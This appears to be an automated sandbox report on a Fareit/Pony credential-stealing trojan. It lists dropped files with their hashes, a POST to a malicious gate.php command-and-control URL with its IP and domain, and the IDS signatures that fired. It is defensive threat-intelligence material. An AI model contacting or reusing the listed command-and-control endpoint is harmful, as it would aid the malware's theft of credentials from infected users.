8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\slk.pdf
text
MD5: d867d0455ec86706f27044f81569c66c
SHA256: 49cb20241344d86f47456ade264339600ecde5c3b449082677b5fb656307cbc7
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\aaj.jpg
text
MD5: 8f9cfd119e5b82f2e38e7c9b3c6c2536
SHA256: 4c670b1590ef33e133b867c0bb81ef38d8b90a69fdbf8d04e899ca110ca40612
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\wdf.mp3
text
MD5: 871412a0e9bb29e4768ffa44ef0fd0d3
SHA256: f50a5ba0ce9be3f30d8757298c291f45ed68d3c76381dc538e0a1d28d9e85a9b
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\lch.bmp
text
MD5: d14465350c17a331ecb38ef3f33f6802
SHA256: ef4265a353430f19cd9cd524a552ebab58f09d6223a7eca525f1558e8803c738
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\xtp.ico
text
MD5: e31b13f8aaa172833a82155acda616ce
SHA256: 661bd6103b89391402e290145a8c9bc8a4f61f9271333cc7c7bf13c354020507
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\vci.docx
text
MD5: c2069426b3cf8d8ef02bbddfdf8a0ca1
SHA256: 1a31f9dba0a08b661157b54d7d5020d598ec853242f5d220968090dac23eaa33
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\qcm.mp4
text
MD5: 54916a157a111880a26c2a85e3a72637
SHA256: 6d030add5ebcbf4233eddf768ae92e359dccc53da36168f46d1cf22d0968096c
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\skj.pdf
text
MD5: a2c3579b6193a4f1daac864859fb007d
SHA256: 73270397197bc844632e9c01b54ed0e4cb7de0d6d06b05e4a9c78763ace70c79
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\sci.bmp
text
MD5: 64eafb8c0ecb5ee2a0401db4d708c24f
SHA256: 8a0c47f9ff776dcd0a97f9d5b69f99554b4fbd80a213cf4f62be4afbfb9bb7ca
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\kdp.ico
text
MD5: 916a9321d0cb0287cc74ff106bc24f5b
SHA256: 6b988d64f82decf8f47ceea9e2c332087f794fca5c969ab9b1d51b05957231e0
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\jid.docx
text
MD5: bb55f95cd3f671b6ed26f98d8f9e80bf
SHA256: 5cb786bcb4cf0f17422b05d3dc7ddda1ab916cc03002f351fd0c5d0037ab4a82
3708
RegSvcs.exe
C:\Users\admin\AppData\Local\Temp\6142828.bat
text
MD5: 3880eeb1c736d853eb13b44898b718ab
SHA256: 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\qgc.icm
text
MD5: a3b18d17757a1be01db68811aad192d0
SHA256: 85c641708e7246170aaaf1ff57dab227cde686a9b3d4a169939a09cd87895731
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\wgn.ppt
text
MD5: c93d7cba7142e64ef440f55f950e60a4
SHA256: 76f0f41522bf4f9f15b1160952525a1af7355e0db19dac0635b2adfea46e1480
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\nfb.jpg
text
MD5: d9229c46969501683e84264dfc900599
SHA256: 1741b7cfe956aba10a735941a792663ceb20c6a15ad1cd1c0dd793abd91b86b4
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\gri.mp4
text
MD5: a6404d0e719a5c50a3a12cd1aae3f572
SHA256: 72a0bf9f348ea96902340e99c742d63d9ac9f579177b32ad1f7eb88c9b34c6dc
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\bgv.docx
text
MD5: 3d9066adcf210a54644c67ee857f3860
SHA256: 109a945493aee126cd4151c9f09ecbd140fb44bf3fe3ceff1102cc18f10dece2
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\xba.pdf
text
MD5: 79daa2f71c8217a1649861ee8833f7bd
SHA256: 1d88fb6fbbcb513c8f7a669d5d4e37f90fe166d2cc4e107d27891920d211c3bf
3440
hhl.exe
C:\Users\admin\AppData\Local\Temp\92255107\KZLRV
text
MD5: 0e6f28a02ade3b07d8793c2476bc358c
SHA256: f18f111910b8f75603f517f258a3854ed519d52a8eecfa711ceaca6eaecb72e6

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
8

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3708 RegSvcs.exe POST –– 111.90.144.65:80 http://aveiro-maroc.cf/ser/gate.php MY
binary
––
––
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3708 RegSvcs.exe 111.90.144.65:80 Shinjiru Technology Sdn Bhd MY malicious

DNS requests

Domain IP Reputation
aveiro-maroc.cf 111.90.144.65
malicious

Threats

PID Process Class Message
–– –– Potentially Bad Traffic ET INFO DNS Query for Suspicious .cf Domain
3708 RegSvcs.exe Potential Corporate Privacy Violation ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
3708 RegSvcs.exe A Network Trojan was detected ET TROJAN Trojan Generic - POST To gate.php with no referer
3708 RegSvcs.exe Potentially Bad Traffic ET INFO HTTP POST Request to Suspicious *.cf Domain
3708 RegSvcs.exe A Network Trojan was detected ET TROJAN Fareit/Pony Downloader Checkin 2
3708 RegSvcs.exe A Network Trojan was detected ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98
3708 RegSvcs.exe A Network Trojan was detected MALWARE [PTsecurity] Fareit/Pony CnC Server stdResponse

1 ETPRO signatures available at the full report

Debug output strings

No debug info.